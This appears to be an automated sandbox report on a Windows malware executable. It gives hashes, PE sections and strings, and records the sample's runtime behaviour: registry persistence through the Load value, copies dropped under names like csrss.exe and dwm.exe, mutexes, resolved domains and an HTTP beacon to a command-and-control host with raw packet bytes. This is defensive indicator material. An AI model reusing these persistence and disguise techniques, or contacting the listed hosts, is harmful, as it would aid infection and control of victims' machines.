Analysis Date2014-06-20 13:38:38
MD5525e8f8fcf8bef282a944b02beee5255
SHA188daebfb4fcda24474d4bee5dd50aa61a6ed0f39

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 264f9b01fdefb58671fd8e6492c92b12 sha1: 08c1013bba5558c7e66d92c0b71418b4f7406adc size: 199680
Section.rdata md5: b2922bf5d49e010b950b305c9bece236 sha1: fec7885dd13fd388636eca7c1f22f2e9ccf7e169 size: 2048
Section.data md5: 7d657c3d6b7cc32bebca2df4aae3c7b5 sha1: 27591ea3ce63274b9a6c7e4dc49779486218e23d size: 15872
Section.tls md5: 2c6b4870ad5611a44e500d62d1dacc6f sha1: dfe8da88d1a013c9e926404369d1b799a4d1c7de size: 512
Timestamp2005-09-20 12:04:25
VersionPrivateBuild: 1544
PEhash016d3552844d5c0f2c0a98c101196276fdb7c1bc
IMPhash61e0ee3745469d565557aba054d8a05c

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpdasoftstorage.com
Winsock DNS127.0.0.1
Winsock DNShappyaladdin.com
Winsock DNSonlinebizdirectory.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSonlinebizdirectory.com
Type: A
184.168.66.121
DNSpdasoftstorage.com
Type: A
DNShappyaladdin.com
Type: A
HTTP GEThttp://onlinebizdirectory.com/images/PowerHideBanner.gif?v8=58&tq=gJ4WK%2FSUh6zGhRMw9YLJoMSTUivqg4asw5JEfqHXarVJ%2BQhhWFc%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 184.168.66.121:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 506f7765   GET /images/Powe
0x00000010 (00016)   72486964 6542616e 6e65722e 6769663f   rHideBanner.gif?
0x00000020 (00032)   76383d35 38267471 3d674a34 574b2532   v8=58&tq=gJ4WK%2
0x00000030 (00048)   46535568 367a4768 524d7739 594c4a6f   FSUh6zGhRMw9YLJo
0x00000040 (00064)   4d535455 69767167 34617377 354a4566   MSTUivqg4asw5JEf
0x00000050 (00080)   71485861 72564a25 32425168 68574663   qHXarVJ%2BQhhWFc
0x00000060 (00096)   25334420 48545450 2f312e30 0d0a436f   %3D HTTP/1.0..Co
0x00000070 (00112)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000080 (00128)   0a486f73 743a206f 6e6c696e 6562697a   .Host: onlinebiz
0x00000090 (00144)   64697265 63746f72 792e636f 6d0d0a41   directory.com..A
0x000000a0 (00160)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000b0 (00176)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000c0 (00192)   322e300d 0a0d0a                       2.0....


Strings
...);X
..f.8q...}=..
Q.
p..(.l
...
.......y..
..}.H..!...E..
.
.1.....
YS)
.LV@.....=...6#.....x...
.O..>zKX
.
.
.
4...p.
..,..p..,lk.#
k1.....
k......
e.%
..
....q
:..
<.z
g5..e.........]F].0.I
.7
s`EaL.PD..

040904b0
1544
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0=\,0(6*%
/3p%vJK
4l{m@O
59hTyl1
#5_m[%
6k4|9no
6uy:v^
9ukkmn
*\acLl
:a!hc8
BeginPaint
<b_	i2
CallWindowProcA
C[dP"C
CharNextA
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateFiber
CreateWindowExA
@.data
DefWindowProcA
DestroyWindow
e/00u)+
e:jW(2
EndPaint
EnumResourceNamesA
EqualRect
ExitProcess
+f?%xluv}
g+5.q\
GetACP
GetClassInfoExA
GetClientRect
GetCommandLineA
GetFocus
GetKeyState
GetLocaleInfoA
GetParent
GetProcAddress
GetSystemInfo
GetWindowLongA
HeapAlloc
HeapCreate
HeapDestroy
HeapReAlloc
HeapSize
)HjUK_
H.)N~>O+A
hRhSkp
i9[*jW
InterlockedCompareExchange
IntersectRect
InvalidateRect
IsChild
IsDebuggerPresent
IsProcessorFeaturePresent
IsWindow
]|*{J%
J]5xt>
;j8WyE
$jZ1[R
k:*4zz
KERNEL32.dll
-\/ki#
k_	X<u
K<YI	o;E
l[2L%/
LoadCursorA
LoadLibraryA
l?}Ox	
LqRl}$>
L:WNmT
~MnZhB
>,mxLH
n!6duj
n	.jw-
<Nl+Ask
NU	}Uo
OffsetRect
O(HJQs"
PtInRect
Q11<{eK
(^&qe2
`.rdata
RealGetWindowClassA
RegisterClassExA
ReleaseDC
rF8?bZ
|R(G'GE
Rich`x
rM2N5	R 
RtlUnwind
,ruuy&GK]
SetFocus
SetThreadPriority
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SetWindowLongA
SetWindowPos
SetWindowRgn
ShowWindow
s|Tbd 
SuspendThread
t47W)\
TerminateProcess
!This program cannot be run in DOS mode.
TXvO(m#
]U3=ef
#/UE=|
UnhandledExceptionFilter
UnionRect
UnregisterClassA
USER32.dll
UUi:*:
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
V>T<Hg
w/+h	uH
WriteFile
wsprintfA
x/8iv1
!x"/A?
x-H^5ZK
~x+n:q
Y2LCYz
<y5oYa
y(	=5zJ/:e
 Y*A't@
"ydXBh#Y)A6Q
-&YR_y
YUi+)@
zo+o7Y